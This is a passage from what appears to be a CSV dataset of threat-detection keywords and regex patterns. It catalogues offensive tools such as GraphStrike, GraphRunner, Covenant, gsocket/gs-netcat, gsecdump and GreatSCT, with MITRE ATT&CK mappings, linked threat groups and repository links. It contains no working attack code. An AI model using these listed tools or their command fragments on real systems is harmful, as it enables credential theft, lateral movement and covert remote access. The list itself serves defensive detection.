TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","46682" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features 
whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","46683" "*GraphLdr.x64.bin*",".{0,1000}GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46684" "*GraphLdr.x64.exe*",".{0,1000}GraphLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46685" "*Graphpython.__main__*",".{0,1000}Graphpython\.__main__.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","46686" "*Graphpython.utils.helpers*",".{0,1000}Graphpython\.utils\.helpers.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - 
TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","46687" "*GraphRunner*access_tokens.txt*",".{0,1000}GraphRunner.{0,1000}access_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46688" "*GraphRunner*chatsResponse.json*",".{0,1000}GraphRunner.{0,1000}chatsResponse\.json.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46689" "*GraphRunner/PHPRedirector*",".{0,1000}GraphRunner\/PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46690" "*GraphRunner\PHPRedirector*",".{0,1000}GraphRunner\\PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46691" "*GraphRunnerGUI.html*",".{0,1000}GraphRunnerGUI\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46692" "*graphspy -i *",".{0,1000}graphspy\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46693" "*GraphSpy.GraphSpy:main*",".{0,1000}GraphSpy\.GraphSpy\:main.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46694" "*GraphSpy-master.zip*",".{0,1000}GraphSpy\-master\.zip.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46695" "*GraphStrike Server is running and checking SharePoint for 
Beacon traffic*",".{0,1000}GraphStrike\sServer\sis\srunning\sand\schecking\sSharePoint\sfor\sBeacon\straffic.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46696" "*GraphStrike.py *",".{0,1000}GraphStrike\.py\s.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46697" "*grayhatkiller/SharpExShell*",".{0,1000}grayhatkiller\/SharpExShell.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","46698" "*GreatSCT*",".{0,1000}GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46699" "*GreatSCT.git*",".{0,1000}GreatSCT\.git.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46700" "*GreatSCT.py*",".{0,1000}GreatSCT\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46701" "*greentm372@gmail.com*",".{0,1000}greentm372\@gmail\.com.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#email","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","46702" "*Greenwolf*",".{0,1000}Greenwolf.{0,1000}","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. 
for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.","T1593 - T1589 - T1195 - T1071","TA0043","N/A","N/A","Reconnaissance","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","N/A","10","3891","799","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z","46703" "*gremwell/o365enum*",".{0,1000}gremwell\/o365enum.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","46704" "*grep-through-commits.sh *",".{0,1000}grep\-through\-commits\.sh\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46715" "*Group3r.cs*",".{0,1000}Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46716" "*Group3r.exe*",".{0,1000}Group3r\.exe.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46717" 
"*Group3r.View.NiceGpoPrinter*",".{0,1000}Group3r\.View\.NiceGpoPrinter.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","46718" "*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46719" "*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46720" "*GruntInjection.exe*",".{0,1000}GruntInjection\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46722" "*gruntstager.cs*",".{0,1000}gruntstager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - 
T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46723" "*GruntStager.exe*",".{0,1000}GruntStager\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46724" "*GS_NETCAT_BIN*",".{0,1000}GS_NETCAT_BIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46725" "*GS_SO_TOR_DOMAIN*",".{0,1000}GS_SO_TOR_DOMAIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46726" "*gsecdump-v2b5.exe*",".{0,1000}gsecdump\-v2b5\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46727" "*G-Security Webshell*",".{0,1000}G\-Security\sWebshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","46728" "*gserver/gServer.go*",".{0,1000}gserver\/gServer\.go.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","46729" "*gs-full-pipe -s *",".{0,1000}gs\-full\-pipe\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46730" "*gs-helloworld gs-pipe gs-full-pipe*",".{0,1000}gs\-helloworld\sgs\-pipe\sgs\-full\-pipe.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46731" "*gsmith257-cyber/better-sliver*",".{0,1000}gsmith257\-cyber\/better\-sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","1","N/A","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","46732" "*gs-mount ~/*",".{0,1000}gs\-mount\s\~\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46733" "*gs-mount -s*",".{0,1000}gs\-mount\s\-s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46734" "*gs-netcat &*",".{0,1000}gs\-netcat\s\&.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46735" "*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46736" "*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46737" "*gs-netcat *.tar.gz*",".{0,1000}gs\-netcat\s.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46738" "*gs-netcat.1*",".{0,1000}gs\-netcat\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46739" "*gs-netcat_freebsd-x86_64*",".{0,1000}gs\-netcat_freebsd\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46740" "*gs-netcat_linux-aarch64*",".{0,1000}gs\-netcat_linux\-aarch64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46741" "*gs-netcat_linux-arm*",".{0,1000}gs\-netcat_linux\-arm.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46742" "*gs-netcat_linux-armhf*",".{0,1000}gs\-netcat_linux\-armhf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46743" "*gs-netcat_linux-armv6*",".{0,1000}gs\-netcat_linux\-armv6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46744" "*gs-netcat_linux-armv7l*",".{0,1000}gs\-netcat_linux\-armv7l.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46745" "*gs-netcat_linux-i686*",".{0,1000}gs\-netcat_linux\-i686.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46746" "*gs-netcat_linux-mips32*",".{0,1000}gs\-netcat_linux\-mips32.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46747" "*gs-netcat_linux-mips64*",".{0,1000}gs\-netcat_linux\-mips64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46748" "*gs-netcat_linux-mipsel*",".{0,1000}gs\-netcat_linux\-mipsel.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46749" "*gs-netcat_linux-x86_64*",".{0,1000}gs\-netcat_linux\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46750" "*gs-netcat_macOS*",".{0,1000}gs\-netcat_macOS.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46751" "*gs-netcat_openbsd-x86_64*",".{0,1000}gs\-netcat_openbsd\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46752" "*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46753" "*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46754" "*gsocket -k *",".{0,1000}gsocket\s\-k\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46755" "*gsocket openvpn *",".{0,1000}gsocket\sopenvpn\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46756" "*gsocket openvpn --*",".{0,1000}gsocket\sopenvpn\s\-\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
